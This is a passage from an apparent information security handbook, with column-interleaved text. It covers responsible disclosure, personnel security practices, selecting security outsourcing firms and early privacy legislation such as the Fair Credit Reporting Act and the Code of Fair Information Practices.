discovered by accident or by hole in distributed or widely available software, you determined attackers. The fact that the bugs and fea- should quietly report it to the vendor as soon as possi- tures are kept secret means that they are unwatched, ble. We would also recommend that you report it to one and probably unpatched. After being discovered, the of the FIRST teams (described in Annex 4, Organizations). existence of the problem will make all similar systems Those organizations can take action to help vendors vulnerable to attack by the persons who discover the develop patches and see that they are distributed in problem. an appropriate manner. Keeping algorithms, such as a locally developed encryp- If you "go public" with a security hole, you endanger tion algorithm, secret is also of questionable value. all of the people who are running that software but Unless you are an expert in cryptography, you are who don't have the ability to apply fixes. In the Unix unlikely to be able to analyze the strength of your environment, many users are accustomed to having algorithm. The result may be a mechanism that has a the source code available to make local modifications to 56Unless you're developing the software all by yourself on your own workstation, several people may have access to the source code, and, intentionally or accidentally, code gets leaked. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 111 correct flaws. Unfortunately, not everyone is so lucky, of defenses as backups in case some fail. For instance, and many people have to wait weeks or months for we buy that second UPS system, or we put a separate updated software from their vendors. Some sites may lock on the computer room door even though we have a not even be able to upgrade their software because lock on the building door. These combinations can be they're running a turn-key application, or one that has defeated too, but we increase the effort and cost for an been certified in some way based on the current config- enemy to do that...and maybe we can convince them uration. Other systems are being run by individuals who that doing so isn't worth the trouble. At the very least, don't have the necessary expertise to apply patches. you can hope to slow them down enough so that your Still others are no longer in production, or are at least monitoring and alarms will bring help before anything out of maintenance. Always act responsibly. It may be significant is lost or damaged. preferable to circulate a patch without explaining or implying the underlying vulnerability than to give With these limits in mind, you need to approach computer attackers details on how to break into unpatched systems. security with a thoughtfully developed set of priorities. You can't protect against every possible threat. We have seen many instances in which a Sometimes you should allow a problem to occur rather well-intentioned person reported a significant security than prevent it, and then clean up afterwards. For problem in a very public forum. Although the person's instance, your efforts might be cheaper and less trouble intention was to elicit a rapid fix from the affected if you let the systems go down in a power failure and vendors, the result was a wave of break-ins to systems then reboot than if you bought a UPS system. And some where the administrators did not have access to the things you simply don't bother to defend against, either P same public forum, or were unable to apply a fix because they are too unlikely (e.g., an alien invasion ART appropriate for their environment. from space), too difficult to defend against (e.g., a nuclear blast within 500 yards of your data center), or Posting details of the latest security vulnerability in simply too catastrophic and horrible to contemplate THREE your system to a mailing list if there is no patch (e.g., your management decides to switch all your Unix available will not only endanger many other sites, machines to some well-known PC operating system). The it may also open you to civil action for damages if key to good management is knowing what things you that flaw is used to break into those sites.57 If you are will worry about, and to what degree. concerned with your security, realize that you're a part of a community. Seek to reinforce the security of Decide what you want to protect and what the costs everyone else in that community as well--and remem- might be to prevent those losses versus the cost of ber that you may need the assistance of others one day. recovering from those losses. Then make your decisions for action and security measures based on a prioritized Conclusions on Policy and Prevention list of the most critical needs. Be sure you include more than your computers in this analysis: don't forget that The key to successful risk assessment is to identify all your backup tapes, your network connections, your termi- of the possible threats to your system, and to defend nals, and your documentation are all part of the system against those attacks which you think are realistic threats. and represent potential loss. The safety of your personnel, your corporate site, and your reputation are also very Simply because people are the weak link doesn't mean we important and should be included in your plans. should ignore other safeguards. People are unpredictable, but breaking into a dial-in modem that does not have a password is still cheaper than a bribe. So, we use techno- logical defenses where we can, and we improve our per- sonnel security by educating our staff and users. We also rely on defense in depth: we apply multiple levels 57Although we are unaware of any cases having been filed yet on these grounds, several lawyers have told us that they are waiting for their clients to request such an action. Several believe this to be a viable course of action. 112 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 6. public and undisclosed security vulnerabilities. Yet PERSONNEL SECURITY despite the fact that numerous policies and laws were broken, no administrative action was taken against At a Glance Deutch, and Deutch was issued a Presidential pardon by Clinton on Clinton's last day of office. This chapter outlines the security issue that emanate If you examine these cases and the vast number of from inside the organization. From hiring and firing pro- computer security violations committed over the past cedures to employee training and awareness, personnel few decades, you will find one common characteristic: security will play a critical role in the organizational 100% of them were caused by people. Break-ins were response to preventive and defensive measures taken on caused by people. Computer viruses were written by the company's behalf. people. Passwords were stolen by people. Personnel Risks: A Hidden Threat to the Organization "Personnel security" is everything involving employees: hiring them, training them, monitoring their behavior, and, sometimes, handling their departure. Statistics Consider a few personnel incidents that made the news show that the most common perpetrators of significant in the last few years: computer crime in some contexts are those people who · Nick Leeson, an investment trader at the Barings Bank have legitimate access now, or who have recently had office in Singapore, and Toshihide Iguchi of the Daiwa access; some studies show that over 80% of incidents Bank office in New York City, each made risky are caused by these individuals. Thus, managing personnel investments and lost substantial amounts of their with privileged access is an important part of a good bank's funds. Rather than admit to the losses, each of security plan. them altered computer records and effectively gambled more money to recoup the losses. Eventually, People are involved in computer security problems in both were discovered after each bank lost more than two ways. Some people unwittingly aid in the commis- one billion dollars. As a result, Barings was forced sion of security incidents by failing to follow proper into insolvency, and Daiwa may not be allowed to procedure, by forgetting security considerations, and by operate in the United States in the future. not understanding what they are doing. Other people knowingly violate controls and procedures to cause or · In the U.S., agents and other individuals with aid an incident. As we have noted earlier, the people high-security clearances at the CIA, the FBI and the who knowingly contribute to your security problems are Armed Forces (Aldrich Ames, Jonathon Pollard, Robert most often your own users (or recent users): they are Hanson, and Robert Walker, to name a few) were dis the ones who know the controls, and know what infor- covered to have been passing classified information mation of value may be present. to Russia and to Israel. Despite several special controls for security, these individuals were able to You are likely to encounter both kinds of individuals in commit damaging acts of espionage -- in some cases, the course of administering a Unix system. The controls for more than a decade. and mechanisms involved in personnel security are many and varied. Discussions of all of them could fill an entire · John Deutch, the director of the CIA under President book, so we'll simply summarize some of the major con- Clinton, was found to have taken classified government siderations. These personnel polices will not prevent secu- information from the Agency to his house, where the rity breaches, but they will reduce the security threats information was stored on classified computers con posed to your enterprise by your own employees. figured for unclassified use and appropriately marked as "unclassified." While the classified information was resident, these same computers were used to access pornographic web sites -- web sites that could have launched attacks against the computers using both Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 113 Security in the Hiring Process We also suggest that you inform the applicant that you are performing these checks, and obtain his or her Background Checks consent. This courtesy will make the checks easier to perform and will put the applicant on notice that you When you hire new employees, check their backgrounds. are serious about your precautions. In some locales you You may have candidates fill out application forms, but will need the explicit permission of the candidate to then what do you do? At the least, you should check all conduct these checks. references given by each applicant to determine his past record, including reasons why he left those posi- Rechecks tions. Be certain to verify the dates of employment, and Once you have finished the tests and hired the candidate, check any gaps in the record. You should also verify any you should consider revisiting some of the checks on a claims of educational achievement and certification: periodic basis. You would then compare the old and new stories abound of individuals who have claimed to have results and observe changes. Some changes should trigger earned graduate degrees from prestigious universities-- deeper investigation. universities that have no records of those individuals ever completing a class. Other cases involve degrees For example, if you have an employee who is in charge from "universities" that are little more than a post of your accounting system, including computer printing office box. Consider that an applicant who lies to get a of checks to creditors, you likely want to conduct more job with you is not establishing a good foundation for than a cursory investigation, including a credit check. future trust. If a recheck occurs every two years and the employee P exhibits spending patterns that are far out of line ART Intensive Investigations with his salary and personal means, you may decide In some instances you may want to make more inten- to investigate further. sive investigations of the character and background of THREE the candidates. Depending on the level of the job and Initial Training the access that this employee will have to systems and Your security concerns with an employee should not sensitive data, you may want to: stop after that person is hired. Every potential computer user should undergo fundamental education in security · Have an investigation agency do a background policy as a matter of course. At the least, this education check. should include procedures for password selection and · Get a criminal record check of the individual. use, physical access to computers and networks (who is · Check the applicant's credit record for evidence of authorized to connect equipment, and how), backup large personal debt and the inability to pay it. Discuss procedures, dial-in policies, and policies for divulging problems, if you find them, with the applicant. People information over the telephone. Executives should not who are in debt should not be denied jobs: if they are, be excluded from these classes because of their status-- they will never be able to regain solvency. At the same they are as likely (or more likely) as other personnel to time, employees who are under financial strain may be pick poor passwords and commit other errors. They, too, more likely to act improperly. must demonstrate their commitment to security: security · Consider conducting a polygraph examination of the consciousness flows from the top down, not the other way. applicant (if legal). Although polygraph exams are not always accurate, they can be helpful if you have a par- Education should include written materials and a ticularly sensitive position to fill. copy of the computer-use policy. The education should · Ask the applicant to obtain bonding for his position. include discussion of appropriate and inappropriate use In general, we don't recommend these steps for hiring of the computers and networks, personal use of comput- every employee. However, you should conduct extra ing equipment (during and after hours), policies on checks of any employee who will be in a position of ownership and use of electronic mail, and policies on trust or privileged access--including maintenance and import and export of software and data. Penalties for cleaning personnel. violations of these policies should also be detailed. 114 INFORMATION SECURITY AND GOVERNMENT POLICIES All users should sign a form acknowledging the receipt of to carelessness and a lack of interest in protecting the this information, and their acceptance of its restrictions. interests of the organization. The staff could also leave These forms should be retained. Later, if any question for better opportunities. Or worse, the staff could arises as to whether the employee was given prior become involved in acts of disruption as a matter of warning about what was allowed, there will be proof. revenge. Overtime must be an exception and not the rule, and all employees--especially those in critical positions-- Ongoing Training and Awareness must be given adequate holiday and vacation time. Periodically, users should be presented with refresher Overworked, chronically tired employees are more likely information about security and appropriate use of the to make mistakes, overlook problems, and become emo- computers. This retraining is an opportunity to explain tionally fragile. They also tend to suffer stress in their good practice, remind users of current threats and their personal lives -- families and loved ones might like to consequences, and provide a forum to air questions and see them occasionally. Overstressed, overworked concerns. employees are likely to become disgruntled, and that does not advance the cause of good security. Your staff should also be given adequate opportunities for ongoing training. This training should include sup- In general, users with privileges should be monitored port to attend professional conferences and seminars, for signs of excessive stress, personal problems, or other subscribe to professional and trade periodicals, and indications of difficulties. Identifying such problems and obtain reference books and other training materials. providing help, where possible, is at the very least Your staff must also be given sufficient time to make humane. Such practice is also a way to preserve valu- use of the material, and positive incentives to master it. able resources--the users themselves, and the resources to which they have access. Coupled with periodic education, you may wish to employ various methods of continuing awareness. Auditing Access These methods could include putting up posters or Ensure that auditing of access to equipment and data notices about good practice, having periodic messages is enabled, and is monitored. Furthermore, ensure of the day with tips and reminders, having an that anyone with such access knows that auditing is "Awareness Day" every few months, or having other enabled. Many instances of computer abuse are sponta- events to keep security from fading into the background. neous in nature. If a possible malefactor knows that the activity and access are logged, he might be discouraged Of course, the nature of your organization, the level of in his actions. threat and possible loss, and the size and nature of your user population should all be factored into your Audit is not only done via the computer. Logs of people plans. The cost of awareness activities should also be entering and leaving the building, electronic lock audit considered and budgeted in advance. trails, and closed-circuit TV tapes all provide some accountability. Performance Reviews and Monitoring The performance of your staff should be reviewed At the same time, we caution against routine, surreptitious periodically. In particular, the staff should be given monitoring. People do not like the idea that they might credit and rewarded for professional growth and good not be trusted and could be covertly watched. If they practice. At the same time, problems should be identified discover that they are, in fact, being watched, they may and addressed in a constructive manner. You must become very angry and may even take extreme action. In encourage staff members to increase their abilities some venues, labor laws and employment contracts can and enhance their understanding. result in the employer's facing large civil judgments. You also want to avoid creating situations in which Simply notifying employees they are being monitored staff members feel overworked, underappreciated, or is not sufficient if the monitoring is too comprehensive. ignored. Creating such a working environment can lead Some studies have shown that employees actually Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 115 misbehave more and are less productive when they are and order entry system. The system was written in a monitored too extensively. This is true whether you are programming language that was not readily known, monitoring how often they take coffee breaks, timing originally provided by a company that had possibly every phone call, or keeping a record of every web site gone out of business. Two people understood the orga- visited. nization's system: the MIS director and her programmer. These two people were responsible for making changes The best policies are those that are formulated with the to the account system's programs, preparing annual input of the employees themselves, and with personnel reports, repairing computer equipment when it broke, from your human resources department (if you have one). and even performing backups (which were stored, off-site, at the MIS director's home office). Least Privilege and Separation of Duties Consider carefully the time-tested principles of least What would happen if the MIS director and her privilege and separation of duties. These should be programmer were killed one day in a car accident on employed wherever practical in your operations. their way to meet with a vendor? What would happen if the MIS director were offered a better job, at twice Least privilege the salary? What if the programmer, unable to advance This principle states that you give each person the in his position because of the need to keep a key minimum access necessary to do his or her job. This employee in his role, became frustrated and angry restricted access is both logical (access to accounts, at the organization? networks, programs) and physical (access to computers, P backup tapes, and other peripherals). If every user has That key personnel are irreplaceable is one of the real ART accounts on every system and has physical access to costs associated with computer systems--one that is everything, then all users are roughly equivalent in rarely appreciated by an organization's senior management. their level of threat. The draw-backs of this case illustrate one more compelling THREE reason to use off-the-shelf software, and to have estab- Separation of duties lished written policies and procedures, so that a newly This principle states that you should carefully hired replacement can easily fill another's shoes. separate duties so that people involved in checking for inappropriate use are not also capable of making Absence and Departure such inappropriate use. Thus, having all the security People leave jobs, sometimes on their own, and sometimes functions and audit responsibilities reside in the same involuntarily--as a result of many circumstances, person is dangerous. This practice can lead to a case including death or physical incapacitation. In the short- in which the person may violate security policy and er term, people also take vacations or are absent for commit prohibited acts, yet in which no other person family or other personal reasons. In any such cases, you sees the audit trail to be alerted to the problem. should have a defined set of actions for how to handle the departure or absence. This procedure should include Limit Your Reliance on Key Employees shutting down accounts (not for absence); forwarding No one in an organization should be irreplaceable, e-mail to appropriate parties; changing critical passwords, because no human is immortal. If your organization phone numbers, and combinations; checking voice mail depends on the ongoing performance of a key employee, accounts; and otherwise removing access to your systems. then your organization is at risk. Organizations cannot help but have key employees. To be secure, organiza- In some environments, this suggestion may be too drastic. tions should have written policies and plans established In the case of a university, for instance, graduated for unexpected illness or departure. students might be allowed to keep accounts active for months or years after they leave. If an employee is out In one case that we are familiar with, a small on vacation or absent for illness for a few days, you will company with 100 employees had spent more than not shut down his or her account, or change passwords 10 years developing its own custom-written accounting and phone numbers. However, in other environments, 116 INFORMATION SECURITY AND GOVERNMENT POLICIES a departure is quite sudden and dramatic. Someone may · Security guards show up at work, only to find the locks changed and a · Delivery personnel who have regular or unsupervised security guard waiting with a box containing everything access that was in the user's desk drawers. The account has · Consultants already been deleted; all system passwords have been · Auditor and other financial personnel changed; and the user's office phone number is no longer assigned. This form of separation management is All personnel who do have access should be trained quite common in financial service industries, and is about security and loss prevention and should be peri- understood to be part of the job. Usually, these are odically retrained. Personnel should also be briefed on employees hired "at will" and with contracts stating incident response procedures and on the penalties for that such a course of action may occur for any reason security violations. -- or no stated reason at all. Use your common sense; in each case, you must determine exactly what the policy Don't forget your family! Whether you are protecting a on access should be and articulate that clearly to the home system or occasionally have your kids visit your employees and the people responsible for implementing office, it is important that they understand that the that policy. computer is not a toy. They should be taught to leave business-critical machines and media alone. Having Security Concerns with Other Personnel strong passwords and screensavers in place can be a major help. Additionally, teach your family members Other people who have access to your system may not all about not discussing your business computing have your best interests in mind -- or they may simply environment with strangers. be ignorant of the damage they can wreak. We've heard stories about home environments where playmates of children have introduced viruses into home office sys- tems, and where spouses have scoured disks for evidence of marital infidelity--and then trashed systems where they have found it. In business environments, there are stories of cleaning staff and office temps who have been caught sabotaging or snooping on company computers. You may not be able to choose your family, but you can have some impact on who accesses the computers at your company location. Visitors, maintenance personnel, contractors, vendors, and others may all have temporary or semi-permanent access to your location and to your systems. You should consider how everything we discussed earlier can be applied to these people with temporary access. At the very least, no one from the outside should be allowed unrestricted physical access to your computer and network equipment. Examples of people whose backgrounds should be examined include: · System operators and administrators · Temporary workers and contractors who have access to the system · Cleaning and maintenance personnel Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 117 CHAPTER 7. West, there has been a boom in the deployment of SECURITY OUTSOURCING consultants and outsourced services to help organizations of all sizes meet their information security needs. At a Glance As with many other outsourced services, some are first-rate and comprehensive, others are overspecialized, and some are downright deficient. Sadly, the state of Outsourcing is one option for managers in public, the field is such that some poor offerings are not private, and non-profit entities who are concerned recognized as such either by the customers or by with their capacity to respond to the security threats the well- intentioned people offering them! discussed in this Handbook. While it may be a good solution for some organizations, the selection of If you have not yet formulated your policies and built outsourcing firms must be done carefully and the new up your disaster recovery and incident response plans, security partners should be monitored for performance we recommend that you get outside assistance in for- on a regular basis. This chapter covers some of the mulating them. What follows, then, is our recommenda- benefits and drawbacks of security outsourcing and tions for organizations that seek to employ outside suggests a series of questions that should be asked security professionals for formulating and implementing before an arrangement is finalized. security policies. There are a number of international Outsourcing as an Alternative to "Doing it organizations that provide assistance to developing Yourself" countries in the field of IT deployment; if such expert- ise is available, it can be valuable in terms of both P short-term support and longer term capacity building After reading through all the material in these chapters, ART (education and training) for the local population. you may have realized that your policies and plans are in good shape, or you may have identified some things Formulating Your Plan of Action to do, or you may be daunted by the whole task. If you THREE are in that last category don't decide that the situation The first thing to do is decide what services you need: is beyond your ability to cope! There are other approaches to formulating your policies and plans, and Will you provide your own in-house security staff? in providing security at your site: through outsourcing, consultants, and contractors. Even if you are an individ- If so, you may only need consultants to review your ual with a small business at home, or a small firm operations to ensure that you haven't missed anything dependent on ICTs, you can take advantage of shared important. expertise --security firms that are able to employ a group of highly-trained and experienced personnel who Perhaps you have some in-house expertise, but are worried would not be fully utilized at any one site, and share about demands on their time, or their ability to respond their talents with a collection of clients whose to a crisis? aggregate needs match their capabilities. Then you may be in the market for an outside firm to On the other hand, if you have strong information place one or more contractors on site with you, full or technology skills, you may consider starting your own part-time. Or, you might simply want to engage the firm to supply expertise and training to others in need services of a remote monitoring and response firm to of those services. There is significant business potential watch your security and assist in the event of an incident. in such enterprises; as there are not enough information security experts available to meet all the needs of Or perhaps you can't afford a full-time staff, or you industry and government worldwide.58 Thus, in the aren't likely to need such assistance? 58The lack of trained security experts is a result, in part, of the lack of personnel and resources to support infor-mation security education at colleges and universities. Government and industry claim that this is an area of importance, but they have largely failed to put any real resources into play to help build up the field. 118 INFORMATION SECURITY AND GOVERNMENT POLICIES In this case, having a contract with a full-service the later "People" section. Be wary of large consulting consulting and monitoring firm may be more firms that will not give you the names of specific cost-effective and provide you with what you need. individuals who would work on your account until after you sign a retainer with them. The key in each of these cases is to understand what your needs are and what the services provide. This Be concerned about corporate stability is not always simple, because unless you have some experience with security and know your environment If you are engaging an organization for a long-term well, you may not really understand your needs. project, you need to be sure that the organization will be there in the long-term. This is not to say that you Choosing a Vendor should avoid hiring young firms and startups; you should simply be sure that the organization has both Your experience with outsourcing policy decisions the management and the financial backing to fulfill all will depend, to a great extent, on the individuals of its commitments. Beware of consulting firms whose or organizations that you choose for the job. prices seem too low -- if the organization can't make money selling you the services that you are buying, then Get a referral; insist on references they need to be making the money somewhere else. Because of the tremendous variation among consulting firms, one of the best ways to find a firm that you like Beware of soup-to-nuts is to ask for a referral from a friendly organization that is similar to yours. Sadly, it is not always possible to Be cautions about "all-in-one" contracts where a single get a referral. Many organizations engage consulting firm both provides you policies and then sells you services firms that they first meet at a trade show, read about and hardware to implement the policies. We have heard in a news article, or even engage after receiving stories of such services where the policy and plan needs a "cold-call" from a salesperson. for every client are suspiciously alike, and all involve the same basic hardware and consulting solutions. If Clearly, an outsourcing firm is in a position to do a you pick a firm that does not lock you into a long-term tremendous amount of damage to your organization. exclusive relationship, then there may be a better Even if the outsourcing firm is completely honest and chance that the policies they formulate for you will reasonably competent, if you trust them to perform a actually match your needs, rather than the equipment function and that function is performed inadequately, that they are selling. you may not discover that anything is wrong until months later when you suffer the consequences -- Insist on breadth of background and after your relationship with the firm is long over. You should be equally cautious of firms in which the bulk For this reason, when you are considering a firm, of their experience is with a specific kind of customer or you should: software platform -- unless your organization precisely matches the other organizations that the firm has had as Check references clients. For example, a consulting firm that primarily offers outsourced security services to medium-sized police Ask for professional references that have engaged the departments running Microsoft Windows may not be the firm or individual to perform services that are similar to best choice for a pharmaceutical firm with a mixed those that you are considering Windows and Unix environment. The consulting firm may simply lack the breadth to offer truly comprehensive policy Check people services for your environment. That isn't to say that people with diverse background can't provide you with an appro- If specific individuals are being proposed for your job, priate perspective, but you need to be cautious if there is evaluate them using the techniques that we outline in no obvious evidence of that "big picture" view. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 119 At a minimum, their personnel should be familiar with: Qualifications of IT Security Personnel 1. Employment law and management issues that may Most importantly, you need to be concerned about the predict conditions under which insiders may harbor actual people who are delivering your security policy a grudge against their employer and implementation services. In contrast to other con- 2. National and local computer crime laws sulting services, you need to be especially cautious of 3. Encryption products, technologies, and limitations consultants who are hired for security engagements -- 4. Issues of viruses, worms, and other malicious because hiring outsiders almost always means that you software, as well as scanning software are granting them some level of privileged access to 5. TCP/IP fundamentals and issues of virtual private your systems and your information. networks (VPNs) and firewalls 6. Awareness and educational issues, materials As we noted earlier, there aren't enough real experts to and services go around. This means that sometimes you have to go 7. Issues of incident response and forensic with personnel whose expertise isn't quite as compre- investigation hensive as you would like, but who have as much as you 8. Security issues peculiar to your hardware and can afford. Be careful of false claims of expertise, or of software the wrong kind of expertise. It is better to hire an indi- 9. Best practices, formal risk assessment vidual or firm that admits they are "learning on the methodologies, and insurance issues job" (and, presumably, lowering their fee as a result), than to hire one that is attempting to hide employee P Any good security policy consulting service should have deficiencies. ART personnel who are willing to talk about (without prompting) the various issues we have discussed in this In the developed world, today's security market is filled Handbook, and this chapter in particular. If they are with people who have varying amounts of expertise THREE not prepared or able to discuss these topics, they may in securing Windows platforms. Expertise in other not be the right service for you. platforms, including Unix, is more limited. A great deal can be learned from books, but that is not enough. If you have any concerns, ask to see a policy and Look for qualifications by the personnel in areas that procedures document prepared for another customer. are of concern. In particular: Some firms may be willing to show you such documentation after it has been sanitized to remove Certification the other customer's name and other identifying aspects. Other firms may have clients who have offered to be Look for certifications. In addition, make sure that "reference clients," although some firms may insist that those certifications are actually meaningful. Some certi- you sign a non-disclosure agreement with them before fications can essentially be purchased: one need only specific documents will be revealed. Avoid any consulting attend a series of classes or online seminars, memorize the firm that shares with you the names and documents of material, and take a test. These are not particularly valu- other clients without those clients' permission. Finally, if able. Other certifications require more in-depth expertise. you have hired outside experts, one of the conditions of your contract should be that they will help develop local Certification is an evolving field, so we hesitate to cite capacity at your organization and, possibly, in your area. current examples. Although it's not everything we would It is quite natural that foreign expertise may be needed like it to be, the CISSP certification59 is one valid measure during transitional periods of learning in developing coun- of a certain level of experience and expertise in security.60 tries. Ideally, you will capitalize on these relationships to transfer knowledge and build local capacity and national expertise when possible. 59See the web portal for CISSP at: http://www.cissps.com/ 60See also, CISA (Certified Information Systems Auditor) and CISM (Certified Information Security Manager) designations from ISACA at: www.isaca.org 120 INFORMATION SECURITY AND GOVERNMENT POLICIES Education Affiliations Check educational backgrounds. Some people with Ask what professional organizations they belong to and excellent computer skills are self-taught and others are in good standing with. ACM, ASIS, CSI, IEEE, and will have degrees from colleges or university programs USENIX are all worthy of note. These organizations provide in computing sciences or computer engineering. In the members with educational materials and professional global context, the level of skill may be more important development opportunities. Many of them also promote that degrees received. However, honesty about education- standards of professional behavior that are worthy of al achievement is important; as we mentioned previously note. If your subject claims membership only in groups in the personnel section, do check to see that claims of like "The 133t Hax0r Guild" or similar, you may wish to education match reality. In the U.S., the National Security look elsewhere for expertise. Agency has designated a limited number of educational institutes as "Centers of Educational Excellence" in the "Reformed" hackers field of information security. In July 2002, that list included pioneering infosec programs at George Mason We recommend against hiring individuals and organizations University; James Madison University; Idaho State; Iowa who boast that they employ "reformed hackers" as security State; the Naval Postgraduate School; Purdue University, consultants.61 Although it is true that some people who the University of California at Davis; and the University of once engaged in computer misdeeds (either "black hat" Idaho. There are many IT initiatives underway around the or "gray hat") can turn their lives around and become world; check your local resources, including universities, productive members of society, you should be immedi- to see where similar centers may be located. In addition, ately suspicious of individuals who tout previous criminal select organization references have been provided in the activity as a job qualification and badge of honor. Annexes of this Handbook. Specifically: Reputation 1. Individuals with a record of flaunting laws, property If someone has written a widely-used piece of software ownership, and privacy rights do not seem to be good or authored a well-known book on a security topic such prospects for protecting property, privacy, and safe- as viruses or cryptography, that does not mean that he guarding your resources. Would you hire a convicted or she knows the security field as a whole. Some arsonist to design your fire alarm system? Would you authors really do have a far-rang-ing and deep back- hire a convicted (but "reformed") pedophile to run your ground in security. Others are simply good writers or company daycare center? Not only are these bad ideas, programmers. Be aware that having a reputation doesn't but they potentially open you up to civil liability should necessarily imply competency at consulting. a problem occur -- after all, you knew the history and hired them anyway. The same is true for hiring "darkside Bonding and insurance but reformed" hackers. 2. Likewise, we believe that you should be concerned Ask if the personnel you want to hire are bonded or about individuals who refuse to provide you with their insured. This indicates that an outside agency is willing legal names in the course of the interview process, but to back the competency and behavior of the people. This instead use consulting handles such as "HackExpert" may not ensure that the consultant is qualified, but it and "Demon Dialer." Mr. Dialer may in fact be an expert does provide some assurance that they are not criminals. in how to penetrate an organization using a telephone system. But one of the primary reasons that people use pseudonyms is so that they cannot be held responsible for their actions. It is much easier (and a lot more common) 61See statistics on U.S. corporations who would hire reformed hackers in the 2003 CSI/FBI Computer Crime and Security Survey: http://i.cmpnet.com/gocsi/db_area/pdfs/fbi/FBI2003.pdf Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 121 to change a handle if you soil its reputation than it is 3. Ensure that due care has been taken in developing, to change your legal name. testing and deploying the technology being added to 3. Finally, many of today's "hackers" really aren't that your systems, especially if it is proprietary in design. In good, anyway -- they are closer in both their manner particular, given Microsoft's record of software quality and their modus operandi to today's street thugs than and security issues, we would suggest that you give they are to today's computer programmers and system very careful thought to using any company that has architects. It's the poor quality of today's operating sys- decided to base their security technology on Microsoft tems, the lack of security procedures, and the wide- products, though the company is working to patch flaws spread availability of automated penetration tools that in their most popular products. makes it possible for today's attackers to compromise 4. Understand whether their technology actually systems. Just as somebody with a record of carjackings helps to prevent problems from occurring, or only is probably not a skilled race car driver and engine detects problems after they have happened designer, somebody who knows how to scam "warez" (e.g., intrusion prevention versus intrusion detection). and launch denial-of-service attacks probably lacks a fundamental understanding of the security needed to Final Words on Outsourcing keep systems safe. Using outside experts can be a smart move to protect Monitoring Services yourself. The skills needed to write policies, monitor your intrusion detection systems and firewalls, and pre- Monitoring services can be a good investment if your pare and execute a disaster recovery plan are specialized P overall situation warrants. Common services provided and uncommon. They may not be available among your ART on an ongoing basis include on-site administration via current staff. Performing these tasks correctly can make contractors, both on-site and off-site monitoring of the difference between staying in business or having some security, on-call incident response and forensics, and flashy and exciting failures. THREE maintenance of a hot-spare/fallback site to be used in the event of a site disaster. But in addition to At the same time, the field of security consulting is being concerned about the individuals who provide fraught with danger because it is new and not well consulting services, you also need to be cautious understood. Charlatans, frauds, naifs, and novices are about what hardware and software they intend to use. present and sometimes difficult to distinguish from the many reliable professionals who are working diligently Many of the monitoring and response firms have hardware in the field. Time will help sort out the issues, but in and software they will want to install on your network. the meantime it pays to invest some time and effort in They use this to collect audit data and manipulate security making the right selection. settings. You need to be cautious about this technology because it is placed in a privileged position inside your We suggest that one way to help protect yourself and security perimeter. In particular, you should: take advantage of the growth of the field is to avoid entering into long-term contracts unless you are very 1. Ensure that you are given complete descriptions, confident in your supplier. The security consulting land- in writing, of the functionality of every item placed on scape is likely to change a great deal over the next few your network or equipment. Be certain you understand years, and having the ability to explore other options as how it works and what it does. those changes occur is likely to be to your benefit. 2. Get a written statement of responsibility for failures. Last of all, simply because you contract for services to If the inserted hardware or software exposes your data to monitor your systems for misuse, don't lose site of the the outside world or unexpectedly crashes your systems need to be vigilant to the extent possible, and to build during peak business hours, you should not then discover your systems to be stronger. As the threats become more that you have agreed that the vendor has no liability. sophisticated, so do the defenders... and potential victims. 122 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 8. Policies That Protect Privacy and PRIVACY POLICIES, LEGISLATION, Privacy Policies AND GOVERNMENT REGULATION What standards should online businesses and organizations At a Glance follow with regard to the personally identifiable information that they gather? This chapter provides an overview of public policies that are directly related to business, non--profit, and govern- In the United States, consumer rights were first mental operations in a networked world. There are some addressed clearly through the passage of the Fair examples of legislation that has been designed to protect Credit Reporting Act in 1970. This law gave consumers citizens, customers, and children from identity theft, fundamental rights, including the right to see their credit fraud, and obscene content; Part 4 contains a deeper reports; the right to know the third-parties to whom their discussion of regulatory issues in "cyberspace," here reports had been disclosed; the right to force credit we are focusing on organizational responsibility for reporting agencies to re-investigate "errors" detected by interactions with the public. This chapter will focus, consumers; the right to force the agencies to include a in brief, on issues that are relevant in the e-commerce statement from the consumer on reports that were in and e-finance contexts. dispute; and a sunset provision requiring credit reporting agencies to purge information on a consumer's report The Business-Customer Relationship in a that was more than seven years old (ten years for infor- Digital World mation regarding bankruptcies). In 1973, the Code of Fair Information Practices was produced to supplement the Online businesses know a lot about their customers. An discussion of consumer rights in an age when computers online merchant knows every product that you look at, were beginning to hold more personal data. every product that you put in your "shopping cart" but 62 later take out, and anything that you've ever purchased The Code of Fair Information Practices from them online. Online merchants also know when you shop, if you shop from home or from work, and--if they The Code of Fair Information Practices is based on five care--what your credit rating is. Furthermore, unlike the principles: offline world, an online merchant can correlate your shopping profile with your web browsing habits. · There must be no personal data record-keeping systems whose very existence is secret. Potentially Internet service providers could learn even more · There must be a way for a person to find out what about their customers because all information that an information about the person is in a record and how Internet user sees must first pass through the provider's it is used. computers. ISPs could also determine the web sites that · There must be a way for a person to prevent their users frequent--and even the individual articles that information about the person that was obtained for have been viewed. They could analyze e-mail messages for one purpose from being used or made available for keywords. By tracking this information, an Internet provider other purposes without the person's consent. could tell if its users are interested in boats or cars, · There must be a way for a person to correct or amend whether they care about fashion, or even if they are a record of identifiable information about the person. interested in particular medical diseases. · Any organization creating, maintaining, using, or disseminating records of identifiable personal data must assure the reliability of the data for its intended use and must take precautions to prevent misuses of the data. 62Source: U.S. Department of Health, Education, and Welfare, 1973. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 123 In the United States, Congress continued to pass Purpose Specification Principle legislation regulating the use of personal information. Over time, banking records, telephone, Internet, and cable The purposes for which personal data is collected should subscriber records, medical records, educational records, be specified not later than at the time of data collection and even video-tape rental records all came under protec- and the subsequent use limited to the fulfillment of tion by U.S. Congressional action. However, each of these those purposes or such others as are not incompatible pieces of legislation offered different protections and was with those purposes and as are specified on each occasion enforced by a different part of the federal government. of change of purpose. Some acts, like the antijunk-fax Telephone Consumer Privacy Act, did not have any enforcement mechanism Use Limitation Principle at all other than private lawsuits.Things were different in Europe. Building on the experience of World War II, Personal data should not be disclosed, made available, during which personal records were misused by the Nazis, or otherwise used for pur-poses other than those specified most European governments created an institutional in accordance with the previous principle except: framework for regulating the collection and use of personal information. The Europeans extended the ideas · With the consent of the data subject, or expressed in the Code of Fair Information Practices into · By the authority of law. an overall system that was termed data protection. Security Safeguards Principle 